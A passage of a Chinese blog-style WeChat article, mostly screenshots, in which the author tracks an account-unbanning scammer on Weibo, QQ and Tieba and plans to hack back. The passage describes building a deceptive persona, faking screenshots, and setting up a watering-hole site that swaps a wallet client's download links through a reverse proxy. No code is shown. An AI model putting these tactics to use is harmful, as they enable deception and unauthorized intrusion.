src="https://wechat2rss.xlab.app/img-proxy/?k=60998f04&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGRQIsYUlj5qRfK4KywACMicWFw7HZ2qhJwaBOeCiajJyaQkhgbsZzOFA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">32</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">被我鹅伤害的支离破碎的💔感到一股暖意，我表示感谢。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">她让我私聊她，要给我看几张图。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在小红书和超话区置顶也有看到过谨防诈骗的提醒，我心想她应该是教训比较深刻，所以迫切的想挽救几个网友，或者释放一下自己的表达欲之类的，就私聊了她。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">她发了几张骗子话术的图片（都是别人传的图），说她昨天被骗了1370，我表示同情，并且好奇骗子是怎么做到的，劝她可以报警试试。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.7383252818035426" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=e8f88d44&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhneicXNcaShmBydD7IsWibSoPZoHniaFJsukuYzQCTRury8zib5a1PDTJ2vQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">33</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.3822714681440442" data-s="300,640" style="" data-type="jpeg" data-w="1083" src="https://wechat2rss.xlab.app/img-proxy/?k=e6020735&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnDAiahiaibNTemIicvYVMZSPDdA0MgtLBz3g1F27psVA9AJfsAnNo94MTDA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">34</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.3779232927970066" data-s="300,640" style="" data-type="jpeg" data-w="1069" src="https://wechat2rss.xlab.app/img-proxy/?k=3f5d0775&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn3gVUnGibdsOWlpD1Auhkb3Bx8xj94XWibiaxcaOcJT8VsvRVDtlD0iawdQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">35</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">最后我感谢她的提醒，准备结束这段愉快的对话。她话锋一转，说自己的微信号是找 “黑客” 解封的。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7866419294990723" data-s="300,640" style="" data-type="jpeg" data-w="1078" src="https://wechat2rss.xlab.app/img-proxy/?k=10fac3d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4gFMVkLjfy2ZBiaA3SjSfrianxpgFIHpvph0iceqEtiagMmqVdFicrLA1IA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">36</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">聊到这我直接不困了啊。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1" data-s="300,640" style="" data-type="png" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=9f3836ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnrKkF1ibNibeQVhkc1BmbTcNGhTsK0tGsJgu9VfiayxU9CssYcYIUljs4Q%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一番娓娓道来，她说你去手机贴吧搜索 <strong style="font-weight: bold;color: black;">“金牌黑客”</strong>，第一个就是他。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8387395736793327" data-s="300,640" style="" data-type="jpeg" data-w="1079" src="https://wechat2rss.xlab.app/img-proxy/?k=8bc3344b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnBq8Xnj41gHH019g0E6RWetcjEnPWduyFy5pPLprnWwSNZDmZI70R2Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">38</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.0269767441860465" data-s="300,640" style="" data-type="jpeg" data-w="1075" src="https://wechat2rss.xlab.app/img-proxy/?k=6c5d4c40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnw0r8e3Kw9gkO564NgjU1DMtypTKdicBicwzEicL8I6S5uRMTViazuOQFug%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">39</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>纯纯哥谭<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我拿电脑一搜，发现看来跟自己预想的差不多，贴吧上已经有人把他骗人的事迹挂出来了，微博账号跟贴吧账号都对得上。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">想来估计微博女号也是他的小号，微博上通过套近乎的方式来把受害人转移到贴吧上，换个角色然后骗钱。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><a href="https://tieba.baidu.com/p/8233493717" target="_blank">https://tieba.baidu.com/p/8233493717</a></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="6.084375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=fb061d74&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnQPEF2XCyQrCicvyBoAbGk8Ip4EH4GP1eLwS650ziaX0CZPNiaXy9L7lIw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">40</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此时我计上心来，老天对我不公，就连你也想踩我一脚？</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是前几天工地比较忙，早出晚归所以一直没有时间动手。我闲暇的时候就在心里建模，设想各种可能性，准备搞一套剧本和基础设施，会会这个金牌黑客。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.45974235104669886" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=7ab3cd56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnrdtl7EN6V8NibCgFr6Wo8S1s7qL045Z1ot7xrbZTs4ZRxTvV4Z9Yd5w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">41</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">到了隔天晚上 <strong style="font-weight: bold;color: black;">“茉俪f”</strong> 来贴心的问我，“他帮你解封了嘛？”，我担心不在微博打招呼，去贴吧找 <strong style="font-weight: bold;color: black;">“金牌黑客”</strong> 的时候过不了验证（就是他联系过谁就只骗谁的钱），就先没有回复她。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.23268921095008052" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6cc36b4b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnYzFDbw80qevW5zbrIBmicHibgNGUsibx0nmmw21wCKoAqgLBQ31cnFQRQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">42</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><strong style="font-weight: bold;color: black;">&lt;- 支线任务出现 -&gt;</strong></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">直到周末，一觉醒来的我闲着没事又逛了一下那个超话，别人帖子下面的一条评论引起了我的兴趣。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有人留了一个QQ群号，我有点好奇被封的人难道还有专门的交流群么？</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.2946859903381642" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=12e9c188&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn9H6buJzQFqlFgwvvNCGH0uIbxBycfiaJo5ku2y2e21b6oUkXQfJzQgw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">43</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">加群之后发现群是禁言的</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.45169082125603865" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=e122e1c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnn6senGTO2Vemic3LklymABdlnuO7t930fGQOHlzw23CwuGWDTcP4Mng%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">44</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3059581320450886" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=99e94040&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnmPgBqGjXoqLjH2pPNsSxUrc4XEqYovDLaHTlDCWhAtUXUibpQP07zTw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">44-1</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">马上有一个管理员来私聊我，说可以解封微信</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5897435897435896" data-s="300,640" style="" data-type="jpeg" data-w="1053" src="https://wechat2rss.xlab.app/img-proxy/?k=6269745f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnI68UY0Xfu3tt1OER88dYWnWDa9TOSpCuqQwVsID1ial8EeoHOM1g2Qw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">45</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我问是怎么实现的，对面号称解封人员的兄弟一顿专业术语像模像样。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8419117647058824" data-s="300,640" style="" data-type="png" data-w="1088" src="https://wechat2rss.xlab.app/img-proxy/?k=3097f190&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn7icSQNhY9leYzSOtAokghWsDc4ic9wemCoibpAH9zEWPNLXvDBgDxuqmg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">46</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><strong style="font-weight: bold;color: black;">此时的我才发现，经历一系列意外后让我介入这些骗局的微博超话，也许并非只是存在偶然出现的小概率陷阱，更可能是一个群狼环伺的黑暗森林！</strong></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>磨刀霍霍<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">事不宜迟，周日我终于决定开始着手准备。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">既然涉及骗钱，就必然涉及付款，所以我计划搞一个区块链剧本，围绕区块链儿来进行人物建模，当时劲头上来咔咔在笔记本记了一些思路。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.3328125" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=0b022b57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnOoDC3uIXicb1Djib9FY39oE7x86vvUqxj1rzeEJ3icj0CWo340kYSsvBQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">47</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">账号设定围绕主题，包含IP属地、活跃时区、关注贴吧等等</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.34555827220863894" data-s="300,640" style="" data-type="jpeg" data-w="1227" src="https://wechat2rss.xlab.app/img-proxy/?k=269790af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnvic7NqlOLAMsz5bqotVZMd8etUBrqXooxRYib2vHJic4uqd7bpbo1xHFA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">48</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8599033816425121" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=be1a2a47&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnp7YQpXUPSq7m5HrLEPpHlKG3oaKCovibMjRNKlLsb1JGJPmP0qTmB4Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">48-1</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">并且准备了一些比较有冲击力的素材，几组图片虽然是同样的内容，但是边框区域不同，可以造成多次重复截不同区域的假象，增加可信度。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7078125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=81a5f73d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn44UWbS0wa6v3I6YfvXy9iaTQZXtTGkozjbNAJzSuy26yibOHnIPIpRKg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">49</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.37734375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=65914e6b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn64U5EGEd5BSqLOehd9uicOPp9k6GeHiajem6G1LRQkOh0HQJmINcGKSA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">50</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8640625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=bdd2118b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn7Kct8MUTTWbsVfbRhooY4uEoDwCHppichicq1NGBJgWcYwy362EKH1Dw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">51</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.54921875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=338b6e4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnQtNIPbibE5cwjEBMdjQ0ZXdW0PumoQxxmBEUfickL42PkXfQZ2vC7ic9Q%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">52</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">水坑web找了个钱包客户端，弄了个反代替换了下win和mac端的下载地址。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7734375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=c01d1fa5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnydPiaYO1RrPFR8OrBEiaDyPfrumKOldbMM2gbswTAxnK8RqZP61mocZg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">53</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">测试了几遍从剧本逻辑到上线什么大问题，也考虑过了万一对面是纯小学生或者真是资深安全从业者的话应该怎么应对。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>闪击波兰<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">正式决定跟 <strong style="font-weight: bold;color: black;">金牌黑客</strong> 建立联系前，我特意去微博回复了<strong style="font-weight: bold;color: black;">“茉俪f”</strong> ，让一切看起来比较顺畅，也预防<strong style="font-weight: bold;color: black;">金牌黑客</strong>问我谁介绍来的之类的验证入口性质的问题。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5975948196114709" data-s="300,640" style="" data-type="jpeg" data-w="1081" src="https://wechat2rss.xlab.app/img-proxy/?k=1c1e5eeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnhfl1V2Xr53N923EAzSzvHloY4wKeKdlooXvLcNYy7KScYpP1oltFkg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">54</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">等了一会儿，可能太晚了金牌黑客没有理我。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">贴吧的设定是两个陌生用户交流的时候，如果第一条消息没有得到回复，那么就不算建立关系，不能继续交流。发图片的话需要双方互相关注才可以。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我想我干脆准备几个话术，到时候懒得打字，所以就发了一堆解释背景之类的话，准备抢先解释，取得对话的主动权。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">（但是后来发现，百度贴吧有个bug，我在美国时区跟金牌黑客聊时，如果重发了在双方建立关系之前发的消息，那条消息的时间是过去的，位置也不会在新的聊天内容的位置，而是在更上面的过去的内容的位置。）</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.1642512077294684" data-s="300,640" style="" data-type="png" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=99c6eb99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnviauxyd1PXpXMfrqp824RpibzY1Y5ZcWe1beQRKz2NkWiaiaUNn4Re8Aibw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">55</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.1642512077294684" data-s="300,640" style="" data-type="png" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=f551c814&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnl1HBoCLE3tdLPicPpMYobYMq6prte4mnCbjWYicxhcGJt4IftYru1O9A%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">56</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">第二天正在去工地的地铁上收到了金牌黑客的回复，简约而充满牌面儿感：哪位</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5885668276972624" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=1fdb51bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn1L1MSu6V4PjuGyeIxBuWHe9FUHhqfOsebibriar9S3E9KuwXz5toc1CA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">57</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是由于中午太忙了（其实我中午忙着收拾QQ群内位天津小伙了，两个故事就分开叙述了），我到了午饭后才回复他。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6537842190016103" data-s="300,640" style="" data-type="jpeg" data-w="1242" 